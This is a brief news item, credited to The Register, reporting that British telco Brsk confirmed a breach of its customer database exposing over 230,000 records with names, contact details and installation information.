British telco Brsk has confirmed a data breach involving unauthorized access to its customer database, affecting over 230,000 records. The stolen data includes customer names, email and home addresses, phone numbers, and installation details.The Register